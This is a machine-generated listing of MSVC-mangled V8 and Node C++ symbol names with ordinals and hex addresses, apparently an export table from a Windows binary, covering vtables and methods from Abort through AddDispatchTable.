                                  ??_7BytecodeRegisterOptimizer@interpreter@internal@v8@@6B@22300x14149a858
                                  ??_7CallInterfaceDescriptor@internal@v8@@6B@22310x141444528
                                  ??_7Cancelable@internal@v8@@6B@22320x141440ec8
                                  ??_7CancelableTask@internal@v8@@6BCancelable@12@@22330x141455ce8
                                  ??_7CancelableTask@internal@v8@@6BTask@2@@22340x141455cf8
                                  ??_7Channel@V8Inspector@v8_inspector@@6B@22350x141440d48
                                  ??_7CheckpointElimination@compiler@internal@v8@@6B@22360x1418e8a08
                                  ??_7CodeEventHandler@v8@@6B@22370x1414db710
                                  ??_7CodeEventLogger@internal@v8@@6B@22380x141483480
                                  ??_7CodeGenerator@compiler@internal@v8@@6B@22390x1418e7bc0
                                  ??_7CommonOperatorReducer@compiler@internal@v8@@6B@22400x1418e8a40
                                  ??_7CompactionSpace@internal@v8@@6B@22410x1414410b0
                                  ??_7CompilationJob@internal@v8@@6B@22420x141452700
                                  ??_7CompilationResultResolver@wasm@internal@v8@@6B@22430x141a022a0
                                  ??_7ConditionalControlFlowBuilder@interpreter@internal@v8@@6B@22440x141496f50
                                  ??_7ConstantFoldingReducer@compiler@internal@v8@@6B@22450x1418ef440
                                  ??_7ContextDeserializer@internal@v8@@6B@22460x1414565e8
                                  ??_7ContextSerializer@internal@v8@@6B@22470x141458e58
                                  ??_7ControlFlowBuilder@interpreter@internal@v8@@6B@22480x141496f18
                                  ??_7CsaLoadElimination@compiler@internal@v8@@6B@22490x1418e8a90
                                  ??_7DateCache@internal@v8@@6B@22500x141464b70
                                  ??_7DbgStreamBuf@internal@v8@@6B@22510x141444648
                                  ??_7DeadCodeElimination@compiler@internal@v8@@6B@22520x1418ef4d0
                                  ??_7Delegate@ValueDeserializer@v8@@6B@22530x141a02540
                                  ??_7Delegate@ValueSerializer@v8@@6B@22540x141a02378
                                  ??_7Deserializer@internal@v8@@6B@22550x1414565e8
                                  ??_7Domain@API@Schema@protocol@v8_inspector@@6B@22560x14143d5a8
                                  ??_7EmbedderGraph@v8@@6B@22570x141a02598
                                  ??_7EmbedderHeapTracer@v8@@6B@22580x141a023d8
                                  ??_7EscapeAnalysisReducer@compiler@internal@v8@@6B@22590x1418ef658
                                  ??_7Exported@protocol@v8_inspector@@6B@22600x14143d5a8
                                  ??_7Extension@v8@@6B@22610x141a02510
                                  ??_7ExternalOneByteStringResource@String@v8@@6B@22620x141a022b8
                                  ??_7ExternalResourceVisitor@v8@@6B@22630x141a02530
                                  ??_7ExternalSourceStream@ScriptCompiler@v8@@6B@22640x141a02340
                                  ??_7ExternalStringResource@String@v8@@6B@22650x141a022b8
                                  ??_7ExternalStringResourceBase@String@v8@@6B@22660x141a02250
                                  ??_7FlatStringReader@internal@v8@@6B@22670x141440e58
                                  ??_7FreeListFastAlloc@internal@v8@@6B@22680x14149d2e8
                                  ??_7FreeListLegacy@internal@v8@@6B@22690x14149d2a0
                                  ??_7FreeListMany@internal@v8@@6B@22700x14149d330
                                  ??_7FreeListManyCached@internal@v8@@6B@22710x14149d378
                                  ??_7FreeListManyCachedFastPath@internal@v8@@6B@22720x141440ef0
                                  ??_7FreeListManyCachedOrigin@internal@v8@@6B@22730x141440f38
                                  ??_7FreeListMap@internal@v8@@6B@22740x14149d3c0
                                  ??_7GraphAssembler@compiler@internal@v8@@6B@22750x1418ecf80
                                  ??_7GraphReducer@compiler@internal@v8@@6B@22760x1418ea770
                                  ??_7I32PairToBigIntDescriptor@internal@v8@@6B@22770x141444588
                                  ??_7I64ToBigIntDescriptor@internal@v8@@6B@22780x141444570
                                  ??_7IdentityMapBase@internal@v8@@6B@22790x14144da48
                                  ??_7Inspectable@V8InspectorSession@v8_inspector@@6B@22800x141440be0
                                  ??_7InstantiationResultResolver@wasm@internal@v8@@6B@22810x141a022a0
                                  ??_7InterpreterDispatchDescriptor@internal@v8@@6B@22820x141444558
                                  ??_7IsolatePlatformDelegate@node@@6B@22830x141a022f0
                                  ??_7Item@ItemParallelJob@internal@v8@@6B@22840x141496f18
                                  ??_7JSCallReducer@compiler@internal@v8@@6B@22850x1418e8af8
                                  ??_7JSContextSpecialization@compiler@internal@v8@@6B@22860x1418e8b28
                                  ??_7JSCreateLowering@compiler@internal@v8@@6B@22870x1418e8b60
                                  ??_7JSGraphAssembler@compiler@internal@v8@@6B@22880x1418e7e20
                                  ??_7JSHeapCopyReducer@compiler@internal@v8@@6B@22890x1418e8b98
                                  ??_7JSIntrinsicLowering@compiler@internal@v8@@6B@22900x1418e8c38
                                  ??_7JSNativeContextSpecialization@compiler@internal@v8@@6B@22910x1418f05b0
                                  ??_7JSTypedLowering@compiler@internal@v8@@6B@22920x1418e8c90
                                  ??_7JumpTableAssembler@wasm@internal@v8@@6B@22930x141441500
                                  ??_7LargeObjectSpace@internal@v8@@6B@22940x141441200
                                  ??_7LoadElimination@compiler@internal@v8@@6B@22950x1418e8cc0
                                  ??_7LocalSpace@internal@v8@@6B@22960x141441008
                                  ??_7LoopBuilder@interpreter@internal@v8@@6B@22970x141496f30
                                  ??_7MachineOperatorReducer@compiler@internal@v8@@6B@22980x1418e8cf0
                                  ??_7MacroAssembler@internal@v8@@6B@22990x141441500
                                  ??_7MeasureMemoryDelegate@internal@v8@@6B@23000x14149ed58
                                  ??_7MeasureMemoryDelegate@v8@@6B@23010x141a025d0
                                  ??_7MemoryMappedFile@OS@base@v8@@6B@23020x141a025d0
                                  ??_7MicrotaskQueue@internal@v8@@6B@23030x1414afae0
                                  ??_7MicrotaskQueue@v8@@6B@23040x141a02300
                                  ??_7MultiIsolatePlatform@node@@6B@23050x141a02428
                                  ??_7NameConverter@disasm@@6B@23060x141442510
                                  ??_7NewSpace@internal@v8@@6B@23070x141440f80
                                  ??_7OFStream@internal@v8@@6B@23080x141455950
                                  ??_7OFStreamBase@internal@v8@@6B@23090x1414445d0
                                  ??_7ObjectIterator@internal@v8@@6B@23100x141440ed0
                                  ??_7OffThreadLargeObjectSpace@internal@v8@@6B@23110x1414a00f8
                                  ??_7OffThreadSpace@internal@v8@@6B@23120x141441158
                                  ??_7Operator@compiler@internal@v8@@6B@23130x1418e4b30
                                  ??_7OutputStream@v8@@6B@23140x141a02278
                                  ??_7PageAllocator@base@v8@@6B@23150x1418dca20
                                  ??_7PagedSpace@internal@v8@@6B@23160x141440770
                                  ??_7PagedSpaceObjectIterator@internal@v8@@6B@23170x141440ee0
                                  ??_7PersistentHandleVisitor@v8@@6B@23180x141a02530
                                  ??_7ProfilerCodeObserver@internal@v8@@6B@23190x1414778b8
                                  ??_7ProfilerEventsProcessor@internal@v8@@6BCodeEventObserver@12@@23200x141477878
                                  ??_7ProfilerEventsProcessor@internal@v8@@6BThread@base@2@@23210x141477858
                                  ??_7ProfilerListener@internal@v8@@6B@23220x141473748
                                  ??_7ReadOnlySerializer@internal@v8@@6B@23230x1414586b8
                                  ??_7Reducer@compiler@internal@v8@@6B@23240x1418e07b0
                                  ??_7RedundancyElimination@compiler@internal@v8@@6B@23250x1418f1020
                                  ??_7RegExpBytecodeGenerator@internal@v8@@6B@23260x14146d2b0
                                  ??_7RegExpMacroAssemblerX64@internal@v8@@6B@23270x1414418f0
                                  ??_7RegisterConfiguration@internal@v8@@6B@23280x141444208
                                  ??_7RemoteObject@API@Runtime@protocol@v8_inspector@@6B@23290x14143d5a8
                                  ??_7Sampler@sampler@v8@@6B@23300x1418dce50
                                  ??_7SamplingEventsProcessor@internal@v8@@6BCodeEventObserver@12@@23310x1414778a8
                                  ??_7SamplingEventsProcessor@internal@v8@@6BThread@base@2@@23320x141477888
                                  ??_7ScopeIterator@debug@v8@@6B@23330x141441358
                                  ??_7SearchMatch@API@Debugger@protocol@v8_inspector@@6B@23340x14143d5a8
                                  ??_7SetupIsolateDelegate@internal@v8@@6B@23350x141496d20
                                  ??_7SimplifiedOperatorReducer@compiler@internal@v8@@6B@23360x1418f1b38
                                  ??_7SnapshotData@internal@v8@@6B@23370x141448ef0
                                  ??_7Space@internal@v8@@6B@23380x1414406f8
                                  ??_7SpaceIterator@internal@v8@@6B@23390x141440e50
                                  ??_7StackTrace@API@Runtime@protocol@v8_inspector@@6B@23400x14143d5a8
                                  ??_7StackTraceId@API@Runtime@protocol@v8_inspector@@6B@23410x14143d5a8
                                  ??_7StackTraceIterator@debug@v8@@6B@23420x1414413b0
                                  ??_7StartupSerializer@internal@v8@@6B@23430x141456368
                                  ??_7StreamingProcessor@wasm@internal@v8@@6B@23440x14144c5e0
                                  ??_7StringBuffer@v8_inspector@@6B@23450x141a02520
                                  ??_7SwitchBuilder@interpreter@internal@v8@@6B@23460x141496f38
                                  ??_7Task@ItemParallelJob@internal@v8@@6B03@@23470x1414a0200
                                  ??_7Task@ItemParallelJob@internal@v8@@6BCancelable@23@@23480x1414a01e8
                                  ??_7Thread@base@v8@@6B@23490x1418dc030
                                  ??_7TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@6B@23500x141a02238
                                  ??_7TracedValue@tracing@v8@@6B@23510x141455c88
                                  ??_7TryCatchBuilder@interpreter@internal@v8@@6B@23520x141496f40
                                  ??_7TryFinallyBuilder@interpreter@internal@v8@@6B@23530x141496f48
                                  ??_7TurboAssembler@internal@v8@@6B@23540x141441500
                                  ??_7TurboAssemblerBase@internal@v8@@6B@23550x1414bd6b0
                                  ??_7TypeNarrowingReducer@compiler@internal@v8@@6B@23560x1418f1e00
                                  ??_7TypedOptimization@compiler@internal@v8@@6B@23570x1418f1e28
                                  ??_7TypedSlotSet@internal@v8@@6B@23580x141440ec0
                                  ??_7TypedSlots@internal@v8@@6B@23590x141440eb8
                                  ??_7V8HeapExplorer@internal@v8@@6B@23600x141476160
                                  ??_7V8Inspector@v8_inspector@@6B@23610x141440d68
                                  ??_7V8InspectorClient@v8_inspector@@6B@23620x141440c70
                                  ??_7V8InspectorSession@v8_inspector@@6B@23630x141440bf0
                                  ??_7V8StackTrace@v8_inspector@@6B@23640x141440b80
                                  ??_7ValueNumberingReducer@compiler@internal@v8@@6B@23650x1418e8d98
                                  ??_7VoidDescriptor@internal@v8@@6B@23660x141444540
                                  ??_8?$basic_ostream@DU?$char_traits@D@std@@@std@@7B@23670x141360408
                                  ??_8OFStream@internal@v8@@7B@23680x141455958
                                  ??_D?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ23690x140458ec0
                                  ??_DOFStream@internal@v8@@QEAAXXZ23700x140458f00
                                  ??_FCpuProfilingOptions@v8@@QEAAXXZ23710x140077d30
                                  ??_FRawMachineLabel@compiler@internal@v8@@QEAAXXZ23720x140e69650
                                  ??_FRegister@interpreter@internal@v8@@QEAAXXZ23730x140421360
                                  ??_FSnapshotCreator@v8@@QEAAXXZ23740x140077a20
                                  ??_FSourcePositionTableBuilder@internal@v8@@QEAAXXZ23750x140421370
                                  ??_FWasmModule@wasm@internal@v8@@QEAAXXZ23760x140421380
                                  ??_UErrorThrower@wasm@internal@v8@@CAPEAX_K@Z23770x14041fbd0
                                  ??_UEscapableHandleScope@v8@@CAPEAX_K@Z23780x14041fbd0
                                  ??_UHandleScope@v8@@CAPEAX_K@Z23790x14041fbd0
                                  ??_URegister@interpreter@internal@v8@@CAPEAX_K@Z23800x14041fbd0
                                  ??_USealHandleScope@v8@@CAPEAX_K@Z23810x14041fbd0
                                  ??_UTryCatch@v8@@CAPEAX_K@Z23820x14041fbd0
                                  ??_VErrorThrower@wasm@internal@v8@@CAXPEAX_K@Z23830x14041fbd0
                                  ??_VEscapableHandleScope@v8@@CAXPEAX_K@Z23840x14041fbd0
                                  ??_VHandleScope@v8@@CAXPEAX_K@Z23850x14041fbd0
                                  ??_VRegister@interpreter@internal@v8@@CAXPEAX_K@Z23860x14041fbd0
                                  ??_VSealHandleScope@v8@@CAXPEAX_K@Z23870x14041fbd0
                                  ??_VTryCatch@v8@@CAXPEAX_K@Z23880x14041fbd0
                                  ?ARM@CPU@base@v8@@2HB23890x1418dc2d0
                                  ?ARM_CORTEX_A12@CPU@base@v8@@2HB23900x1418dc2f0
                                  ?ARM_CORTEX_A15@CPU@base@v8@@2HB23910x1418dc2f4
                                  ?ARM_CORTEX_A5@CPU@base@v8@@2HB23920x1418dc2e0
                                  ?ARM_CORTEX_A7@CPU@base@v8@@2HB23930x1418dc2e4
                                  ?ARM_CORTEX_A8@CPU@base@v8@@2HB23940x1418dc2e8
                                  ?ARM_CORTEX_A9@CPU@base@v8@@2HB23950x1418dc2ec
                                  ?Abort@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4AbortReason@34@@Z23960x14088f1f0
                                  ?Abort@OS@base@v8@@SAXXZ23970x140dc0420
                                  ?Abort@StreamingDecoder@wasm@internal@v8@@QEAAXXZ23980x140574530
                                  ?Abort@TurboAssembler@internal@v8@@QEAAXW4AbortReason@23@@Z23990x140496c30
                                  ?Abort@WasmModuleObjectBuilderStreaming@v8@@QEAAXV?$MaybeLocal@VValue@v8@@@2@@Z24000x1400768e0
                                  ?Abort@WasmStreaming@v8@@QEAAXV?$MaybeLocal@VValue@v8@@@2@@Z24010x140533e40
                                  ?AbortAll@CompilerDispatcher@internal@v8@@QEAAXXZ24020x1409d54f0
                                  ?AbortCSAAssert@CodeAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@@Z24030x140e69670
                                  ?AbortCSAAssert@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ24040x140e0dc30
                                  ?AbortCSAAssert@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@@Z24050x140ee1420
                                  ?AbortConcurrentOptimization@Isolate@internal@v8@@QEAAXW4BlockingBehavior@23@@Z24060x140979250
                                  ?AbortJob@CompilerDispatcher@internal@v8@@QEAAX_K@Z24070x1409d5600
                                  ?AbortOptimization@OptimizedCompilationInfo@internal@v8@@QEAAXW4BailoutReason@23@@Z24080x1409dc9d0
                                  ?AbortedCodeGeneration@AssemblerBase@internal@v8@@UEAAXXZ24090x1400768e0
                                  ?Abspd@MacroAssembler@internal@v8@@QEAAXVXMMRegister@23@@Z24100x140496d50
                                  ?Absps@MacroAssembler@internal@v8@@QEAAXVXMMRegister@23@@Z24110x140496df0
                                  ?AccessorConstant@Descriptor@internal@v8@@SA?AV123@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z24120x14075a140
                                  ?AccountCommitted@Space@internal@v8@@QEAAX_K@Z24130x1404213e0
                                  ?AccountUncommitted@Space@internal@v8@@QEAAX_K@Z24140x140421400
                                  ?AccountedFree@PagedSpace@internal@v8@@QEAA_K_K0@Z24150x140421410
                                  ?AcquireDataOwnership@ScriptData@internal@v8@@QEAAXXZ24160x140519fa0
                                  ?ActivateIncrementalWriteBarrier@IncrementalMarking@internal@v8@@AEAAXPEAVNewSpace@23@@Z24170x1409201b0
                                  ?ActivateIncrementalWriteBarrier@IncrementalMarking@internal@v8@@AEAAXPEAVPagedSpace@23@@Z24180x1409201e0
                                  ?ActivateIncrementalWriteBarrier@IncrementalMarking@internal@v8@@AEAAXXZ24190x140920210
                                  ?ActivationFrameAlignment@OS@base@v8@@SAHXZ24200x1401b1c40
                                  ?ActivationFrameBase@Thread@WasmInterpreter@wasm@internal@v8@@QEAAII@Z24210x140542350
                                  ?Add@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@PEAVInternalIndex@23@@Z24220x14076b0e0
                                  ?Add@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@PEAVInternalIndex@23@@Z24230x14076b190
                                  ?Add@ArrayList@internal@v8@@SA?AV?$Handle@VArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@2@Z24240x14076b240
                                  ?Add@ArrayList@internal@v8@@SA?AV?$Handle@VArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@@Z24250x14076b400
                                  ?Add@BitVector@internal@v8@@QEAAXH@Z24260x140453070
                                  ?Add@ByteData@PreparseDataBuilder@internal@v8@@QEAAXE@Z24270x140724f80
                                  ?Add@BytecodeLoopAssignments@compiler@internal@v8@@QEAAXVRegister@interpreter@34@@Z24280x140e9f7b0
                                  ?Add@CodeCommentsWriter@internal@v8@@QEAAXIV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z24290x1409f9e70
                                  ?Add@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4BinaryOperationHint@34@@Z24300x140eabe20
                                  ?Add@ObjectHashSet@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@@Z24310x14076b860
                                  ?Add@OrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashMap@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2@Z24320x14075c460
                                  ?Add@OrderedHashMapHandler@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2@Z24330x14075c6f0
                                  ?Add@OrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashSet@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z24340x14075c7a0
                                  ?Add@OrderedHashSetHandler@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z24350x14075ca00
                                  ?Add@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedNameDictionary@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z24360x14075caa0
                                  ?Add@OrderedNameDictionaryHandler@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z24370x14075cd60
                                  ?Add@PrototypeUsers@internal@v8@@SA?AV?$Handle@VWeakArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VMap@internal@v8@@@23@PEAH@Z24380x14076ba70
                                  ?Add@Set@v8@@QEAA?AV?$MaybeLocal@VSet@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z24390x140a78a60
                                  ?Add@SmallOrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashMap@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2@Z24400x14075ce30
                                  ?Add@SmallOrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashSet@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z24410x14075d090
                                  ?Add@SmallOrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedNameDictionary@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z24420x14075d270
                                  ?Add@StringSet@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VString@internal@v8@@@23@@Z24430x14076bdb0
                                  ?AddAll@BitVector@internal@v8@@QEAAXXZ24440x1404530c0
                                  ?AddAllocation@GCTracer@internal@v8@@QEAAXN@Z24450x14093f400
                                  ?AddAllocationObserver@Space@internal@v8@@UEAAXPEAVAllocationObserver@23@@Z24460x1408d0100
                                  ?AddAllocationObserver@SpaceWithLinearArea@internal@v8@@UEAAXPEAVAllocationObserver@23@@Z24470x1408d0150
                                  ?AddArgument@AsmFunctionType@wasm@internal@v8@@QEAAXPEAVAsmType@234@@Z24480x140a62c20
                                  ?AddArrayType@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEAVArrayType@234@@Z24490x14052e920
                                  ?AddArrowFunctionFormalParameters@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@PEAVExpression@23@H@Z24500x14072ab20
                                  ?AddAsmWasmOffset@WasmFunctionBuilder@wasm@internal@v8@@QEAAX_K0@Z24510x14052e960
                                  ?AddAttachedObject@Deserializer@internal@v8@@IEAAXV?$Handle@VHeapObject@internal@v8@@@23@@Z24520x1405ffce0
                                  ?AddBackgroundScopeSample@GCTracer@internal@v8@@QEAAXW4ScopeId@BackgroundScope@123@N@Z24530x14093f590
                                  ?AddBeforeCallEnteredCallback@Isolate@internal@v8@@QEAAXP6AXPEAV13@@Z@Z24540x140979270
                                  ?AddBeforeCallEnteredCallback@Isolate@v8@@QEAAXP6AXPEAV12@@Z@Z24550x140a78eb0
                                  ?AddBignum@Bignum@internal@v8@@QEAAXAEBV123@@Z24560x1408479c0
                                  ?AddBinaryOpICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ24570x140421450
                                  ?AddBlock@LocalHandles@internal@v8@@AEAAPEA_KXZ24580x140963b20
                                  ?AddBlockRequiringSpillOperand@TopLevelLiveRange@compiler@internal@v8@@QEAAXVRpoNumber@234@PEBVRegisterAllocationData@234@@Z24590x140e7d3b0
                                  ?AddBranch@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@00@Z24600x140e42160
                                  ?AddBreakFlags@Thread@WasmInterpreter@wasm@internal@v8@@QEAAXE@Z24610x140542420
                                  ?AddBuildEmbedderGraphCallback@HeapProfiler@v8@@QEAAXP6AXPEAVIsolate@2@PEAVEmbedderGraph@2@PEAX@Z2@Z24620x140a78ec0
                                  ?AddCall@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@00@Z24630x140e42240
                                  ?AddCallCompletedCallback@Isolate@internal@v8@@QEAAXP6AXPEAV13@@Z@Z24640x1409792b0
                                  ?AddCallCompletedCallback@Isolate@v8@@QEAAXP6AXPEAV12@@Z@Z24650x140a78ed0
                                  ?AddCallICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ24660x140421470
                                  ?AddCaseEquivalents@CharacterRange@internal@v8@@SAXPEAVIsolate@23@PEAVZone@23@PEAV?$ZoneList@VCharacterRange@internal@v8@@@23@_N@Z24670x1406be970
                                  ?AddCategory@FreeListManyCached@internal@v8@@UEAA_NPEAVFreeListCategory@23@@Z24680x1408d0220
                                  ?AddCharacterCore@StringHasher@internal@v8@@SAIIG@Z24690x14041a610
                                  ?AddChild@PreparseDataBuilder@internal@v8@@AEAAXPEAV123@@Z24700x140724fa0
                                  ?AddClassEscape@CharacterRange@internal@v8@@SAXDPEAV?$ZoneList@VCharacterRange@internal@v8@@@23@PEAVZone@23@@Z24710x1406becf0
                                  ?AddClassEscape@CharacterRange@internal@v8@@SAXDPEAV?$ZoneList@VCharacterRange@internal@v8@@@23@_NPEAVZone@23@@Z24720x1406bf050
                                  ?AddCloneObjectSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ24730x140421490
                                  ?AddClonedNode@GraphAssembler@compiler@internal@v8@@IEAAPEAVNode@234@PEAV5234@@Z24740x140ec2900
                                  ?AddCode@CodeMap@internal@v8@@QEAAX_KPEAVCodeEntry@23@I@Z24750x1406d4920
                                  ?AddCode@NativeModule@wasm@internal@v8@@QEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@HAEBVCodeDesc@34@HHV?$Vector@$$CBE@34@1W4Kind@WasmCode@234@W4ExecutionTier@234@W4ForDebugging@234@@Z24760x14056cfa0
                                  ?AddCodeEntry@CodeMap@internal@v8@@AEAAI_KPEAVCodeEntry@23@@Z24770x1406d4a30
                                  ?AddCodeEventListener@Logger@internal@v8@@QEAAXPEAVCodeEventListener@23@@Z24780x14084aba0
                                  ?AddCodeForTesting@NativeModule@wasm@internal@v8@@QEAAPEAVWasmCode@234@V?$Handle@VCode@internal@v8@@@34@@Z24790x14056d160
                                  ?AddCodeMemoryChunk@Isolate@internal@v8@@QEAAXPEAVMemoryChunk@23@@Z24800x1400768e0
                                  ?AddCodeMemoryRange@Isolate@internal@v8@@AEAAXUMemoryRange@3@@Z24810x1409792f0
                                  ?AddCodeRange@Isolate@internal@v8@@QEAAX_K0@Z24820x1409794c0
                                  ?AddCodeSpace@NativeModule@wasm@internal@v8@@AEAAXVAddressRegion@base@4@AEBVOptionalLock@WasmCodeAllocator@234@@Z24830x14056d6a0
                                  ?AddCodeTarget@AssemblerBase@internal@v8@@IEAAHV?$Handle@VCode@internal@v8@@@23@@Z24840x1409fadd0
                                  ?AddCodeWithCodeSpace@NativeModule@wasm@internal@v8@@AEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@HAEBVCodeDesc@34@HHV?$Vector@$$CBE@34@1W4Kind@WasmCode@234@W4ExecutionTier@234@W4ForDebugging@234@V?$Vector@E@34@AEBUJumpTablesRef@1234@@Z24850x14056db00
                                  ?AddCompactionEvent@GCTracer@internal@v8@@QEAAXN_K@Z24860x14093f5f0
                                  ?AddCompareICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ24870x1404214b0
                                  ?AddCompiledCode@NativeModule@wasm@internal@v8@@QEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@UWasmCompilationResult@234@@Z24880x14056de40
                                  ?AddCompiledCode@NativeModule@wasm@internal@v8@@QEAA?AV?$vector@V?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@V?$allocator@V?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@@2@@std@@V?$Vector@UWasmCompilationResult@wasm@internal@v8@@@34@@Z24890x14056df60
                                  ?AddConstant@InstructionSequence@compiler@internal@v8@@QEAAHHVConstant@234@@Z24900x1404530f0
                                  ?AddContext@SnapshotCreator@v8@@QEAA_KV?$Local@VContext@v8@@@2@USerializeInternalFieldsCallback@2@@Z24910x140a78ee0
                                  ?AddContextDisposalTime@GCTracer@internal@v8@@QEAAXN@Z24920x14093f650
                                  ?AddCrashKey@Isolate@internal@v8@@QEAAXW4CrashKeyId@3@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z24930x1404214d0
                                  ?AddCrashKeysForIsolateAndHeapPointers@Isolate@internal@v8@@AEAAXXZ24940x1409794e0
                                  ?AddCurrentStack@ProfilerEventsProcessor@internal@v8@@QEAAX_N@Z24950x1406e7150
                                  ?AddData@SnapshotCreator@v8@@AEAA_KV?$Local@VContext@v8@@@2@_K@Z24960x140a78fb0
                                  ?AddData@SnapshotCreator@v8@@AEAA_K_K@Z24970x140a791a0
                                  ?AddDataElement@JSObject@internal@v8@@SAXV?$Handle@VJSObject@internal@v8@@@23@IV?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z24980x1407b0c60
                                  ?AddDataSegment@WasmModuleBuilder@wasm@internal@v8@@QEAAXPEBEII@Z24990x14052ea30
                                  ?AddDecorator@Graph@compiler@internal@v8@@QEAAXPEAVGraphDecorator@234@@Z25000x140ea1bd0
                                  ?AddDecorator@NodeOriginTable@compiler@internal@v8@@QEAAXXZ25010x140ed6b30
                                  ?AddDecorator@SourcePositionTable@compiler@internal@v8@@QEAAXXZ25020x140ea5330
                                  ?AddDeoptStack@ProfilerEventsProcessor@internal@v8@@QEAAX_KH@Z25030x1406e7260
                                  ?AddDeoptimizationEntry@InstructionSequence@compiler@internal@v8@@QEAAHPEAVFrameStateDescriptor@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@AEBUFeedbackSource@234@@Z25040x140e040d0
                                  ?AddDeoptimizationExit@CodeGenerator@compiler@internal@v8@@AEAAPEAVDeoptimizationExit@234@PEAVInstruction@234@_K@Z25050x140e47870
                                  ?AddDeoptimize@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z25060x140e42320
                                  ?AddDeserializedCode@NativeModule@wasm@internal@v8@@QEAAPEAVWasmCode@234@HV?$Vector@$$CBE@34@HHHHHHH000W4Kind@5234@W4ExecutionTier@234@@Z25070x14056e340
                                  ?AddDetachedContext@Isolate@internal@v8@@QEAAXV?$Handle@VContext@internal@v8@@@23@@Z25080x1409796a0
                                  ?AddDispatchTable@WasmTableObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@H@Z25090x14051ed30
